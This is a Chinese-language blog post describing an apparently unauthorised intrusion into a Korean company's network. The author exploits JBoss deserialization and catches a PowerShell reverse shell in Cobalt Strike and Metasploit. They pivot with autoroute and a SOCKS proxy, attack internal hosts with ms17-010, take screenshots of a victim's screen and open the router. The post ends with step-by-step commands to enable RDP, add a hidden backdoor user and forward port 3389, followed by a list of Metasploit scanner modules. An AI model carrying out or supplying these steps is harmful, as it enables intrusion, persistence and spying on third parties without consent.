一次内网漫游

2020-05-25 19:13:12 admin 103

本文作者 : 重生信安 - 鲨鱼

本人喜欢在各大群里吹牛X,突然看到有人问3389端口怎么转发,卧槽搞事情,连忙加上好友怕装X赶不上热乎,从此刻开始了一次内网漫游。
经过一番了解,是一台韩国主机存在JBOSS反序列化,内网主机端口映射到外网8080,掏出我的尘封已久的宝贝。

32734-onh0skdc3dn.png

我喜欢使用Cobalt Strike来接收shell,因为有心跳不易断开连接,接下来利用powershell反弹shell。

03886-txhhqtxlbds.png

生成powershell并执行。

12488-chrtoiwn2fi.png
41579-9r4p2l00rmk.png

OK接收到shell,接下来将shell外联到msf 。
43349-onm838k3x7j.png

host 填写 msf的ip  port则为msf监听的端口。

msf设置监听。

31862-x3in2bmnokb.png

use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost 127.0.0.1set lport 6666run

cs进行联动。

43120-w0fz4iqy2e.png

17786-yii46xjrfdb.png

msf接收到shell,并查看路由表。

04372-qgkbcn5jhtg.png

route list #查看路由

36050-z35fxqrz6d.png

run autoroute -s  #添加一条去内网ip的路由
run autoroute -p # 查看路由

23741-hjyvhyxlqjh.png
用tcp扫描内网网段端口主机存活情况。

use auxiliary/scanner/portscan/tcp
set rhosts 192.168.0.1/24
set threads 50run

89300-duuapq1j6zc.png

看到开放不少445,可以侦探下ms17-010.

53797-nmuy4yx5qz.png

这么多ms17,韩国人都不打补丁的吗?

use auxiliary/scanner/smb/smb_ms17_010 #探测ms17-010
set rhosts 192.168.0.1/24
set threads 50run

打一波ms17-010,在另外多开一个msf窗口设置监听。

61605-5jghhpt80de.png

设置ms17-010exp进行攻击。
73798-x3byrkeke8b.png

use exploit/windows/smb/ms17_010_psexecset payload windows/meterpreter/reverse_tcpset lhost  #接收ipset lport   #接收端口set rhost   #漏洞主机iprun

70472-ka4rwrj8nzb.png

43691-zlyfp46pnk.png

另外一个在监听的msf接收到shell。

82253-j6wz3mukb.png

screenshot #截图

56785-i5q9kjbt10a.png

看一眼韩国人在干嘛,有点看不懂。

刚才扫描内网端口看到192.168.0.1有80端口,估计是个路由器我过去看看。

65098-b4m7fcxmelb.png

use auxiliary/server/socks4arun

设置socks隧道代理

17763-6u7oyhm4tt.png

52235-9qvthokk2jd.png

设置好可以利用proxychains 进行代理访问内网。

90312-8pfyzpo7gz2.png

使用nmap扫描内网。

23529-r1dl39wzsfs.png

firefox浏览器使用代理打开即可访问内网web。

12600-juklceko1t.png

访问192.168.0.1发现是路由器设置页面无需密码即可访问。

89348-6mxdx6bxmt5.png

内网才这么几台电脑??瞬间没什么兴趣了。

79195-i8xd6vvejeh.png

VPN??还可以啦。

就到这里吧,ms17-010就可以给内网打完了,就不用什么smb弱口令扫描,ipc入侵,一堆弱口令扫描了,内网里没什么环境。


远程桌面(端口转发):

run getgui -e #开启远程桌面
run getgui -u hack$ -p 123.com # 添加用户
portfwd add -l 1111 -p 3389 -r 192.168.0.13//将192.135主机3389转发本机111rdesktop -u 账号  -p 密码    本机ip:端口    // 远程连接

内网扫描模块:

1,端口扫描

auxiliary/scanner/portscanscanner/portscan/ack        ACK防火墙扫描
scanner/portscan/ftpbounce  FTP跳端口扫描
scanner/portscan/syn        SYN端口扫描
scanner/portscan/tcp        TCP端口扫描
scanner/portscan/xmas       TCP"XMas"端口扫描

2,SMB扫描

auxiliary/scanner/smb/smb_enumusers       smb枚举
auxiliary/scanner/smb/pipe_dcerpc_auditor       返回DCERPC信息
auxiliary/scanner/smb/smb2     扫描SMB2协议
auxiliary/scanner/smb/smb_enumshares      扫描smb共享文件
auxiliary/scanner/smb/smb_enumusers        枚举系统上的用户
auxiliary/scanner/smb/smb_login             SMB登录
use windows/smb/psexec        (通过md5值登录)SMB登录
auxiliary/scanner/smb/smb_lookupsid     扫描组的用户
auxiliary/scanner/smb/smb_version       扫描系统版本

3,mssql扫描(端口tcp1433udp1434)

admin/mssql/mssql_enum     MSSQL枚举
admin/mssql/mssql_exec     MSSQL执行命令
admin/mssql/mssql_sql      MSSQL查询
scanner/mssql/mssql_login  MSSQL登陆工具
scanner/mssql/mssql_ping   测试MSSQL的存在和信息

4,smtp扫描

auxiliary/scanner/smtp/smtp_enum      smtp枚举
auxiliary/scanner/smtp/smtp_version    扫描smtp版本

5,ssh扫描

auxiliary/scanner/ssh/ssh_login        ssh登录
auxiliary/scanner/ssh/ssh_login_pubkey     ssh公共密钥认证登录
auxiliary/scanner/ssh/ssh_version             扫描ssh版本测试

6,telnet扫描

auxiliary/scanner/telnet/telnet_login     telnet登录
auxiliary/scanner/telnet/telnet_version   扫描telnet版本

7,tftp扫描

auxiliary/scanner/tftp/tftpbrute       扫描tftp的文件
scanner/ftp/anonymous           ftp版本扫描
auxiliary/scanner/discovery/arp_sweep   ARP扫描
auxiliary/scanner/discovery/udp_probe    扫描UDP服务的主机
auxiliary/scanner/discovery/udp_sweep    检测常用的UDP服务
auxiliary/sniffer/psnuffle       sniffer密码
scanner/snmp/community     snmp扫描
scanner/vnc/vnc_none_auth       vnc扫描无认证扫描


电话咨询
在线留言
QQ客服